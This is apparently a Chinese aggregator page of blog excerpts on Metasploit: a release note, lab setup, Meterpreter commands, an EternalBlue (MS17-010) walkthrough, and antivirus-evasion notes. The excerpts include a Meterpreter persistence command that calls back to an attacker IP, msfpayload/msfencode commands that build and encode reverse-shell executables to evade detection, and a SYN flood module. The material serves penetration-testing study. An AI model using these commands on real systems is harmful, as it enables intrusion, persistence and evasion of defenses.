metasploit

Metasploit发布了版本5.0.76

我的未来我决定 提交于 2020-02-23 04:02:55
Metasploit发布了版本5.0.76 在该版本中,增加了以下模块: (1)增强了set payload命令的输入。用户在指定payload时,在payload名称前可以使用/payload、payload/和/前缀。 (2)post/windows/manage/sshkey_persistence和post/ linux/manage/sshkey_persistence模块:利用SSH Key实施渗透。 (3)post/multi/recon/local_exploit_suggester模块:提升Diamorphine Rootkit信号权限。 (4)module exploit/ linux/smtp/apache_james_exec模块:利用Apache James 2.3.2漏洞创建文件。 更新了以下模块: (1)post/windows/gather/enum_patches 模块:收集所有Windows补丁。 (2)更新了generate命令:避免分段显示攻击载荷信息。 (3)post/ linux/gather/enum_system模块:通过从/sys/devices/system/ cpu/ vulnerabilities目录收集的信息,来检查CPU漏洞。 (4)更新了msfconsole和msfvenom的Zsh completions。 来源:

metasploit扫描

泄露秘密 提交于 2020-02-21 03:14:36
实验目的 : 一、 基于TCP协议收集主机信息 二、 基于SNMP协议收集主机信息 三、 基于SMB协议收集信息 四、 基于SSH协议收集信息 五、 基于FTP协议收集信息 实验环境:kali、win7、metasploitable2 0 开始环境搭建 首先win7环境搭建 : 打开vmware,选择创建新的虚拟机。 ​这里选择典型安装,比较方便。(考虑到对2020版有些使用的不习惯,下面在遇到坑点会给出解决方式) 选择版本Linux -》Debian 6 64位 选择位置 推荐C盘以外的位置 因为是测试环境,选择默认大小就好 保存为单个文件 选择自定义硬件 这里修改下内存分配在1G空间就好 。 点击关闭,完成创建。 ​开启虚拟机,选择Graphical install 安装 等待一会 ,选择中文简体(为什么选择个呢,其他的我看不懂) 进入 等待一会 1处修改任意 1处符合格式 2继续 因为是虚拟机的网络配置为NAT,所以直接进入到配置用户名密码处 等待一会,配置时间中 因为是测试环境,这里选择第一个 继续,这里的三个选项,都可以。本人懒所以选第一个 继续 结束设定 开始安装基本系统,等待一小会。。。 扫描镜像站,时间太长。。。不推荐在这里使用网络镜像 如果在这里填写成错会显示找不到站点。否则是漫长的等待,等待时上1小时左右,网卡者更长。。。 当这里出错时

Metasploit学习笔记——强大的Meterpreter

拜拜、爱过 提交于 2020-02-08 14:59:29
1. Meterpreter命令详解 1.1基本命令 使用Adobe阅读器渗透攻击实战案例打开的Meterpreter会话实验,靶机是WinXP。由于所有命令与书中显示一致,截图将书中命令记录下来。 1.2文件系统命令 1.3网络命令 1.4系统命令 2.后渗透攻击模块 2.1persistence后渗透攻击模块 示例代码如下 meterpreter > run persistence -X -i 5 -p 443 -r 10.10.10.128 [!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe. [!] Example: run post/windows/manage/persistence_exe OPTION=value [...] [*] Running Persistence Script [*] Resource file for cleanup created at /root/.msf4/logs/persistence/DH-CA8822AB9589_20200206.5256/DH-CA8822AB9589_20200206.5256.rc [*] Creating Payload=windows/meterpreter/reverse_tcp

Metaspolit

帅比萌擦擦* 提交于 2020-02-08 04:32:16
Metaspolit介绍 Metasploit是一款开源的安全漏洞检测工具,安全工作人员常用 Metasploit工具来检测系统的安全性。Metasploit Framework (MSF) 在2003年以开放源码方式发布,是可以自由获取的开发框架。它为渗透测试、shellcode 编写和漏洞研究提供了一个可靠平台。 Metaspolit安装 从官方网站 http://www.metasploit.cn 下载windows版本的安装版,直接安装即可。 温馨提示:请关闭防火墙和杀毒软件。 Metaspolit的使用 Metasploit目前提供了三种用户使用接口: Console模式:功能最全面,建议使用; GUI模式:用户友好度最高,但功能不是最完整的; CLI模式:命令行模式,用于批量处理。 Metaspolit的Console模式介绍 Console模式启动 通常启动较慢,需等待10分钟左右,开始界面如下: 加载完毕后如图所示: 常用指令介绍 A 帮助指令--- ?/help B 查看所有的漏洞脚本---show exploits C 查看某个脚本的信息---info exploit/windows/wins/ms04_045_wins 渗透过程演示 如果确定使用什么脚本进行攻击的时候,则用以下指令按步骤进行操作 1 使用某个脚本 use exploit/windows

Metasploit安装db_autopwn.rb模块

北慕城南 提交于 2020-01-30 19:31:26
Step1:安装db_autopwn.rb模块 root@kali:~# cd /usr/share/metasploit-framework/plugins git clone https://github.com/hahwul/metasploit-db_autopwn.git root@kali:/usr/share/metasploit-framework/plugins# cd metasploit-db_autopwn/ root@kali:/usr/share/metasploit-framework/plugins/metasploit-db_autopwn# mv db_autopwn.rb /usr/share/metasploit-framework/plugins/ Step2:启动msfconsole检查模块安装 msf5 > load db_autopwn msf5 > db_nmap 192.168.1.0/24 来源: https://www.cnblogs.com/networking/p/12243470.html

Metasploit使用教程(一)

扶醉桌前 提交于 2020-01-30 19:02:19
Step1:启动postsql数据库 root@kali:~# service postgresql start Step2:初始化msf数据库 root@kali:~# msfdb init [i] Database already started [+] Creating database user 'msf' [+] Creating databases 'msf' [+] Creating databases 'msf_test' [+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml' [+] Creating initial database schema Step3:进入msf控制台 root@kali:~# msfconsole MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMM MMMMMMMMMM MMMN$ vMMMM MMMNl MMMMM MMMMM JMMMM MMMNl MMMMMMMN NMMMMMMM JMMMM MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM MMMNI

Metasploit windows安装和使用

你离开我真会死。 提交于 2020-01-22 19:08:10
1.软件下载 http://downloads.metasploit.com/data/releases/metasploit-latest-windows-installer.exe https://pan.baidu.com/s/1VBnAiqJEk4GO-zRYnmO_RQ 2.安装 注意:安装时关闭杀毒软件和防火墙 3.安装完后就直接在安装目录打开msfconsole.bat 中间过程可能有点慢不要着急,稍微等一会就能打开了。 简单使用举例:tcp syn攻击 进入目录msf5 > use auxiliary/dos/tcp/synflood 根据实际情况设置ip和端口以及一些其他信息,设置完直接run就可以了 来源: CSDN 作者: NewSunRise 链接: https://blog.csdn.net/ak66366/article/details/104071546

永恒之蓝漏洞复现(ms17-010)

情到浓时终转凉″ 提交于 2020-01-20 16:20:03
目录 Metasploit 使用方法 ms17-010漏洞复现 1. 主机发现 2. 进入MSF框架 3. 使用ms17-010扫描模块,对靶机进行扫描 4. 使用ms17-010攻击模块,对靶机进行攻击 后渗透阶段 Post后渗透模块 查看目标主机是否运行在虚拟机上 关闭杀毒软件 访问文件系统 下载/上传文件 权限提升 获取用户密码 Metasploit Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。 MSF的更新 :apt update apt install metasploit-framework 使用方法 进入框架:msfconsole 使用search命令查找相关漏洞: search ms17-010 使用use进入模块: use exploit/windows/smb/ms17_010_eternalblue 使用info查看模块信息: info 设置攻击载荷:set payload windows/x64/meterpreter

Metasploit学习之免杀技术

时光总嘲笑我的痴心妄想 提交于 2020-01-12 11:36:03
文章目录 面杀技术 使用msf攻击载荷生成器创建可独立运行的二进制文件 躲避杀毒软件的检测 MSF编码器 多重编码 自定义可执行文件模板 隐秘地启动一个攻击载荷 加壳软件 小结 面杀技术 使用msf攻击载荷生成器创建可独立运行的二进制文件 msfpayload windows/shell_reverse_tcp O 使用O选项来查看可用的参数 msfpayload windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=31337 X /var/www/payload1.exe 躲避杀毒软件的检测 MSF编码器 MSF编码器是一个非常实用的工具,它能够改变可执行文件中的代码形状 msfpayload windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -t exe > /var/www/payload2.exe 多重编码 ``msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw |msfencode -e x86

Installing Metasploit Framework on OS X Yosemite, metasploit-framework -v '4.10.1.pre.dev' not found

孤者浪人 提交于 2020-01-06 02:20:37
问题 I am trying to install Metasploit Framework on OS X Yosemite and whilst running bundle install the installer gets stuck on trying to install metasploit-framework -v '4.10.1.pre.dev'. When I run gem install metasploit-framework -v '4.10.1.pre.dev' on it's own I get this error: ERROR: Could not find a valid gem 'metasploit-framework' (= 4.10.1.pre.dev) in any repository ERROR: Possible alternatives: test_framework, metasploit-yard, metasploit-runner, metasploit-erd, metasploit-concern Has